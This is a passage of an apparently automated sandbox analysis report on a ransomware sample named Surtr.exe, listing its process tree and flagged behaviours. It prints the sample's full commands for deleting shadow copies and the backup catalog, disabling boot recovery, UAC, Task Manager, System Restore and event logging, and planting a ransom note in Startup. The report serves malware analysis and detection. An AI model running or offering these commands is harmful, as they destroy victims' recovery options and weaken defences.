3600 wrote to memory of 3352 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3352 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 100 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 100 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1420 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1420 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 644 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 644 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 756 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 756 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3968 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3968 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2268 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2268 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4112 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4112 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4120 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4120 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4128 3600 Surtr.exe vssadmin.exe PID 3600 wrote to memory of 4128 3600 Surtr.exe vssadmin.exe PID 3600 wrote to memory of 4180 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4180 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4232 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4232 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4240 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4240 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4316 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4316 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4324 3600 Surtr.exe cmd.exe -
Views/modifies file attributes 1 TTPs 8 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1812 attrib.exe 6064 attrib.exe 5472 attrib.exe 5720 attrib.exe 4964 attrib.exe 4888 attrib.exe 4696 attrib.exe 5264 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Surtr.exe"C:\Users\Admin\AppData\Local\Temp\Surtr.exe"1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4372⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4373⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB2⤵
-
